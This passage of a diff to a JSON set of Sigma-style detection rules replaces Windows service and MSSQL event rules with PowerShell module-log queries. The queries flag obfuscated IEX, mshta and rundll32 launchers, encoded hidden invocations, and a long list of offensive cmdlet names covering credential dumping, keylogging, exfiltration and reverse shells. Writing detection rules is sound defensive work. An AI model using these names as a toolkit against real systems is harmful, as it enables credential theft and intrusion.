"52a85084-6989-40c3-8f32-091e12e17692", + "title": "Use Get-NetTCPConnection - PowerShell Module", + "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. 
Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_susp_get_nettcpconnection.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE 
'\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. 
Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the library for administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "author": "Nikita Nazarov, oscd.community", 
@@ -4634,1522 +4197,1490 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" }, { - "title": "Application Uninstalled", - "id": "570ae5ec-33dc-427c-b815-db86228ad43e", + "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", + "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", "status": "experimental", - "description": "An application has been removed. 
Check if it is critical.", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Very special / sneaky PowerShell scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MsiInstaller' AND EventID IN ('11724', '1034'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "win_builtin_remove_application.yml" + "filename": "posh_pm_susp_invocation_generic.yml" }, { - "title": "MSSQL XPCmdshell Option Change", - "id": "d08dd86f-681e-4a00-a92c-1db218754417", - "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Module)", + "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Legitimate enable/disable of the setting", - "Note that since the event contain the change for both values. 
This means that this will trigger on both enable and disable" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '15457' AND Data LIKE '%xp\\_cmdshell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" ], - "filename": "win_mssql_xp_cmdshell_change.yml" + "filename": "posh_pm_remote_powershell_session.yml" }, { - "title": "Ntdsutil Abuse", - "id": "e6e88853-5f20-4c4a-8d26-cd469fd8d31f", + "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", + "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID IN ('216', '325', '326', '327') AND Data LIKE '%ntds.dit%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' 
ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" ], - "filename": "win_esent_ntdsutil_abuse.yml" + "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" }, { - "title": "MSSQL Disable Audit Settings", - "id": "350dfb37-3706-4cdc-9e2e-5e24bc3a46df", + "title": "Suspicious Get Information for SMB Share - PowerShell Module", + "id": "6942bd25-5970-40ab-af49-944247103358", "status": "experimental", - "description": "Detects when an attacker calls the \"ALTER SERVER AUDIT\" or \"DROP SERVER AUDIT\" transaction in order to delete or disable audit logs on the server", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "This event should only fire when an administrator is modifying the audit policy. 
Which should be a rare occurrence once it's set up" + "Administrator script" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND (Data LIKE '%statement:ALTER SERVER AUDIT%' ESCAPE '\\' OR Data LIKE '%statement:DROP SERVER AUDIT%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_susp_smb_share_reco.yml" }, { - "title": "Dump Ntds.dit To Suspicious Location", - "id": "94dc4390-6b7c-4784-8ffc-335334404650", - "status": "experimental", - "description": "Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", + "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", + "status": "test", + "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ - "Legitimate backup operation/creating shadow copies" + "Administrator script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'ESENT' AND EventID = '325' AND Data LIKE '%ntds.dit%' ESCAPE '\\' AND (Data LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR 
Data LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Appdata\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Data LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Data LIKE '%C:\\\\ntds.dit%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" ], - "filename": "win_esent_ntdsutil_abuse_susp_location.yml" + "filename": "posh_pm_susp_ad_group_reco.yml" }, { - "title": "Backup Catalog Deleted", - "id": "9703792d-fd9a-456d-a672-ff92efe4806a", + "title": "Malicious PowerShell Commandlets - PoshModule", + "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", "status": "test", - "description": "Detects backup catalog deletions", - "author": "Florian Roth (Nextron Systems), Tom U. 
@c_APT_ure (collection)", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '524' AND Provider_Name = 'Microsoft-Windows-Backup')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' 
ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE 
'%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR 
Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "win_susp_backup_delete.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSI Installation From Suspicious Locations", - "id": "c7c8aa1c-5aff-408e-828b-998e3620b341", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - 
